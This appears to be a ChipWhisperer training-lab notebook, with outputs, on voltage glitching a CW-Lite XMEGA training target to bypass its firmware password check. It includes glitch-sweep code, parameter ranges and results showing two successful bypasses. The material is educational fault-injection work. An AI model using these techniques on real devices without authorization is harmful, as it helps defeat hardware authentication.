# Part 2, Topic 2: Voltage Glitching to Bypass Password

---
NOTE: This lab references some (commercial) training material on [ChipWhisperer.io](https://www.ChipWhisperer.io). You can freely execute and use the lab per the open-source license (including using it in your own courses if you distribute similarly), but you must maintain notice about this source location. Consider joining our training course to enjoy the full experience.

---

**SUMMARY:** *We've seen how voltage glitching can be used to corrupt calculations, just like clock glitching. Let's continue on and see if it can also be used to break past a password check.*

**LEARNING OUTCOMES:**

* Applying previous glitch settings to new firmware
* Checking for success and failure when glitching

## Firmware

Again, we've already covered this lab, so it'll be mostly up to you!

In [1]:
SCOPETYPE = 'OPENADC'
PLATFORM = 'CWLITEXMEGA'
SS_VER = 'SS_VER_2_1'

CRYPTO_TARGET = 'TINYAES128C'
allowable_exceptions = None
VERSION = 'HARDWARE'


In [2]:

#!/usr/bin/env python
# coding: utf-8

# In[ ]:


import chipwhisperer as cw

try:
    if not scope.connectStatus:
        scope.con()
except NameError:
    scope = cw.scope(hw_location=(5, 4))

try:
    if SS_VER == "SS_VER_2_1":
        target_type = cw.targets.SimpleSerial2
    elif SS_VER == "SS_VER_2_0":
        raise OSError("SS_VER_2_0 is deprecated. Use SS_VER_2_1")
    else:
        target_type = cw.targets.SimpleSerial
except:
    SS_VER="SS_VER_1_1"
    target_type = cw.targets.SimpleSerial

try:
    target = cw.target(scope, target_type)
except:
    print("INFO: Caught exception on reconnecting to target - attempting to reconnect to scope first.")
    print("INFO: This is a work-around when USB has died without Python knowing. Ignore errors above this line.")
    scope = cw.scope(hw_location=(5, 4))
    target = cw.target(scope, target_type)


print("INFO: Found ChipWhisperer😍")


# In[ ]:


if "STM" in PLATFORM or PLATFORM == "CWLITEARM" or PLATFORM == "CWNANO":
    prog = cw.programmers.STM32FProgrammer
elif PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
    prog = cw.programmers.XMEGAProgrammer
elif "neorv32" in PLATFORM.lower():
    prog = cw.programmers.NEORV32Programmer
elif PLATFORM == "CW308_SAM4S" or PLATFORM == "CWHUSKY":
    prog = cw.programmers.SAM4SProgrammer
else:
    prog = None


# In[ ]:


import time
time.sleep(0.05)
scope.default_setup()

def reset_target(scope):
    if PLATFORM == "CW303" or PLATFORM == "CWLITEXMEGA":
        scope.io.pdic = 'low'
        time.sleep(0.1)
        scope.io.pdic = 'high_z' #XMEGA doesn't like pdic driven high
        time.sleep(0.1) #xmega needs more startup time
    elif "neorv32" in PLATFORM.lower():
        raise IOError("Default iCE40 neorv32 build does not have external reset - reprogram device to reset")
    elif PLATFORM == "CW308_SAM4S" or PLATFORM == "CWHUSKY":
        scope.io.nrst = 'low'
        time.sleep(0.25)
        scope.io.nrst = 'high_z'
        time.sleep(0.25)
    else:  
        scope.io.nrst = 'low'
        time.sleep(0.05)
        scope.io.nrst = 'high_z'
        time.sleep(0.05)




INFO: Found ChipWhisperer😍


scope.gain.mode                          changed from low                       to high                     
scope.gain.gain                          changed from 0                         to 30                       
scope.gain.db                            changed from 5.5                       to 24.8359375               
scope.adc.basic_mode                     changed from low                       to rising_edge              
scope.adc.samples                        changed from 24400                     to 5000                     
scope.adc.trig_count                     changed from 10925032                  to 22115229                 
scope.clock.adc_src                      changed from clkgen_x1                 to clkgen_x4                
scope.clock.adc_freq                     changed from 69115631                  to 29538459                 
scope.clock.adc_rate                     changed from 69115631.0                to 29538459.0               
scope.clock.clkgen_

In [3]:
%%bash -s "$PLATFORM" "$SS_VER"
cd ../../../firmware/mcu/simpleserial-glitch
make PLATFORM=$1 CRYPTO_TARGET=NONE SS_VER=$2 -j

SS_VER set to SS_VER_2_1


SS_VER set to SS_VER_2_1


avr-gcc (GCC) 5.4.0
Copyright (C) 2015 Free Software Foundation, Inc.
This is free software; see the

 source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A

 PARTICULAR PURPOSE.



...

+--------------------------------------------------------
+-----------------------------------------

---------------


+ Built for platform CW-Lite XMEGA with:
+ CRYPTO_TARGET = NONE


+ CRYPTO_OPTIONS = 


+--------------------------------------------------------


In [4]:
fw_path = "../../../firmware/mcu/simpleserial-glitch/simpleserial-glitch-{}.hex".format(PLATFORM)
cw.program_target(scope, prog, fw_path)
if SS_VER=="SS_VER_2_1":
    target.reset_comms()

XMEGA Programming flash...


XMEGA Reading flash...


Verified flash OK, 2799 bytes


In [5]:
def reboot_flush():
    reset_target(scope)
    target.flush()
if PLATFORM == "CWLITEXMEGA":
    scope.clock.clkgen_freq = 32E6
    if SS_VER=='SS_VER_2_1':
        target.baud = 230400*32/7.37
    else:
        target.baud = 38400*32/7.37
elif (PLATFORM == "CWLITEARM") or ("F3" in PLATFORM):
    scope.clock.clkgen_freq = 24E6
    if SS_VER=='SS_VER_2_1':
        target.baud = 230400*24/7.37
    else:
        target.baud = 38400*24/7.37
    

In [6]:
#Do glitch loop
reboot_flush()
pw = bytearray([0x74, 0x6F, 0x75, 0x63, 0x68])
target.simpleserial_write('p', pw)

val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10)#For loop check
valid = val['valid']
if valid:
    response = val['payload']
    raw_serial = val['full_response']
    error_code = val['rv']

print(val)

{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': CWbytearray(b'00 72 01 01 d4 00'), 'rv': bytearray(b'\x00')}


Like with clock glitching, the scope object can set some typical glitch settings for you, with the additional requirement of specifying the transistor to use for glitching (`'both'`, `'lp'`, and `'hp'`):

In [7]:
if scope._is_husky:
    scope.vglitch_setup('hp', default_setup=False)
else:
    scope.vglitch_setup('both', default_setup=False) # use both transistors

In [8]:
gc = cw.GlitchController(groups=["success", "reset", "normal"], parameters=["width", "offset", "ext_offset"])
gc.display_stats()

IntText(value=0, description='success count:', disabled=True)

IntText(value=0, description='reset count:', disabled=True)

IntText(value=0, description='normal count:', disabled=True)

FloatSlider(value=0.0, continuous_update=False, description='width setting:', disabled=True, max=10.0, readout…

FloatSlider(value=0.0, continuous_update=False, description='offset setting:', disabled=True, max=10.0, readou…

FloatSlider(value=0.0, continuous_update=False, description='ext_offset setting:', disabled=True, max=10.0, re…

In [9]:
gc.glitch_plot(plotdots={"success":"+g", "reset":"xr", "normal":None})

:DynamicMap   []
   :Overlay
      .Points.I  :Points   [width,offset]
      .Points.II :Points   [width,offset]

In [10]:
gc.set_range("ext_offset", 0, 150)
if scope._is_husky:
    gc.set_range("width", 1900, 1901)
    gc.set_range("offset", 2000, 2500)
    gc.set_global_step([50])
    gc.set_step("ext_offset", 1)
else:
    if PLATFORM=="CWLITEXMEGA":
        gc.set_range("width", 43.5, 47.8)
        gc.set_range("offset", -48, -10)
        #gc.set_range("ext_offset", 7, 10)
        gc.set_range("ext_offset", 30, 45)
        scope.glitch.repeat = 11
    elif PLATFORM == "CWLITEARM":
        #should also work for the bootloader memory dump
        gc.set_range("width", 30.7, 36)
        gc.set_range("offset", -40, -35)
        scope.glitch.repeat = 7
    elif PLATFORM == "CW308_STM32F3":
        #these specific settings seem to work well for some reason
        #also works for the bootloader memory dump
        gc.set_range("ext_offset", 11, 31)
        gc.set_range("width", 47.6, 49.6)
        gc.set_range("offset", -19, -21.5)
        scope.glitch.repeat = 5
        
gc.set_step("ext_offset", 1)

AttributeError: 'GlitchController' object has no attribute '_num_steps'

In [11]:
#disable logging
cw.set_all_log_levels(cw.logging.CRITICAL)

scope.adc.timeout = 0.1
successes = 0

reboot_flush()

for glitch_settings in gc.glitch_values():
    scope.glitch.offset = glitch_settings[1]
    scope.glitch.width = glitch_settings[0]
    scope.glitch.ext_offset = glitch_settings[2]
    if scope.adc.state:
        # can detect crash here (fast) before timing out (slow)
        #print("Trigger still high!")
        gc.add("reset")
        reboot_flush()

    scope.arm()
    target.simpleserial_write('p', bytearray([0]*5))
    ret = scope.capture()
    scope.io.vglitch_reset()
    
    if ret:
        #print('Timeout - no trigger')
        gc.add("reset")

        #Device is slow to boot?
        reboot_flush()
    else:
        val = target.simpleserial_read_witherrors('r', 1, glitch_timeout=10, timeout=50)#For loop check
        if val['valid'] is False:
            gc.add("reset")
        else:
            if val['payload'] == bytearray([1]): #for loop check
                successes +=1 
                gc.add("success")
                print(val)
                print(val['payload'])
                print(scope.glitch.width, scope.glitch.offset, scope.glitch.ext_offset)
                print("🐙", end="")
            else:
                gc.add("normal")
                    
#reenable logging
cw.set_all_log_levels(cw.logging.WARNING)

{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': CWbytearray(b'00 72 01 01 d4 00'), 'rv': bytearray(b'\x00')}
CWbytearray(b'01')
46.484375 -10.9375 43
🐙

{'valid': True, 'payload': CWbytearray(b'01'), 'full_response': CWbytearray(b'00 72 01 01 d4 00'), 'rv': bytearray(b'\x00')}
CWbytearray(b'01')
47.65625 -39.84375 44
🐙

Let's see where we needed to target for our glitch to work:

In [12]:
gc.calc(["width", "offset"], "success_rate")

[((44,),
  {'total': 218,
   'success': 1,
   'success_rate': 0.0045871559633027525,
   'reset': 60,
   'reset_rate': 0.27522935779816515,
   'normal': 157,
   'normal_rate': 0.7201834862385321}),
 ((43,),
  {'total': 224,
   'success': 1,
   'success_rate': 0.004464285714285714,
   'reset': 67,
   'reset_rate': 0.29910714285714285,
   'normal': 156,
   'normal_rate': 0.6964285714285714}),
 ((45,),
  {'total': 204,
   'success': 0,
   'success_rate': 0.0,
   'reset': 48,
   'reset_rate': 0.23529411764705882,
   'normal': 156,
   'normal_rate': 0.7647058823529411}),
 ((42,),
  {'total': 226,
   'success': 0,
   'success_rate': 0.0,
   'reset': 69,
   'reset_rate': 0.3053097345132743,
   'normal': 157,
   'normal_rate': 0.6946902654867256}),
 ((41,),
  {'total': 237,
   'success': 0,
   'success_rate': 0.0,
   'reset': 81,
   'reset_rate': 0.34177215189873417,
   'normal': 156,
   'normal_rate': 0.6582278481012658}),
 ((40,),
  {'total': 209,
   'success': 0,
   'success_rate': 0.0,
   '

In [13]:
scope.dis()
target.dis()

In [14]:
assert successes >= 1